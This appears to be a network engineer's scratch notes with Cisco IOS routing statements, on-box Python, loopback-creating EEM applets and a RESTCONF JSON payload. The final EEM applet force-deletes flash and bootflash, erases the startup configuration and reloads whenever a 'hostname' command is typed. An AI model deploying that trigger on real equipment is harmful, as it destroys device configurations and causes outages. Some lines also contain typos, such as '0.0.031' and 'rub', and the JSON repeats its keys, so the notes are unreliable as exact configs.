10.2.3.187/27


router eigrp 100
network 10.2.3.160 0.0.0.31
!

router ospf 1
network 10.2.3.160 0.0.031 area 0



network prefix - is network address of a ip address



import cli
var1 = [
    "show ip int brief",
]
for k in var1:
    cli.executep(k)
	
	
	
import cli
var2 = '''hostname NETDEVOPS
int loop 4
ip add 4.4.4.4 255.255.255.255
int loop 5
ip add 5.5.5.5 255.255.255.255
int loop 6
ip add 6.6.6.6 255.255.255.255
end
'''
cli.configurep(var2)




config t
no event manager applet gawaloop
event manager applet gawaloop
 event none
 action 1.0 puts "How many Loopback interfaces do you wish to create?"
 action 1.1 puts nonewline "> "
 action 1.2 gets num 
 action 2.0 cli command "enable"
 action 2.1 cli command "conf t"
 action 3.0 set i "1"
 action 3.1 while $i le $num
 action 3.2  cli command "interface Loopback $i"
 action 3.3  cli command "ip address $i.$i.$i.$i 255.255.255.255"
 action 3.4  increment i 1
 action 3.5 end
 action 4.0 cli command "end"
 end
 event manager run gawaloop
 
 removing loopbacks:
config t
no event manager applet siraloop
event manager applet siraloop
 event none
 action 1.0 puts "How many Loopback interfaces do you wish to die?"
 action 1.1 puts nonewline "> "
 action 1.2 gets num 
 action 2.0 cli command "enable"
 action 2.1 cli command "conf t"
 action 3.0 set i "1"
 action 3.1 while $i le $num
 action 3.2  cli command "no interface Loopback $i"
 action 3.4  increment i 1
 action 3.5 end
 action 4.0 cli command "end"
 end
 event manager run siraloop
 
***********************************


{
    "ietf-interfaces:interface": {
        "name": "Loopback7",
        "description": "Configured by RESTCONF",
        "type": "iana-if-type:softwareLoopback",
        "enabled": true,
        "ietf-ip:ipv4": {
            "address": [
                {
                    "ip": "7.7.7.7",
                    "netmask": "255.255.255.0"
                }
            ]
        }
    },
	"ietf-interfaces:interface": {
        "name": "Loopback8",
        "description": "Configured by RESTCONF",
        "type": "iana-if-type:softwareLoopback",
        "enabled": true,
        "ietf-ip:ipv4": {
            "address": [
                {
                    "ip": "8.8.8.8",
                    "netmask": "255.255.255.0"
                }
            ]
        }
    },
	"ietf-interfaces:interface": {
        "name": "Loopback9",
        "description": "Configured by RESTCONF",
        "type": "iana-if-type:softwareLoopback",
        "enabled": true,
        "ietf-ip:ipv4": {
            "address": [
                {
                    "ip": "9.9.9.9",
                    "netmask": "255.255.255.0"
                }
            ]
        }
    }
}

**********************************


config t
no event manager applet auto-delete-flash-and-reboot
event manager applet auto-delete-flash-and-reboot
 event cli pattern "hostname" sync no skip yes
 action 1.0 cli command "delete /force /recursive flash:"
 action 1.1 cli command "delete /force /recursive bootflash:"
 action 1.2 cli command "erase startup-config"
 action 2.0 syslog msg "Deleting flash and rebooting the device..."
 action 3.0 reload
 event manager rub auto-delete-flash-and-reboot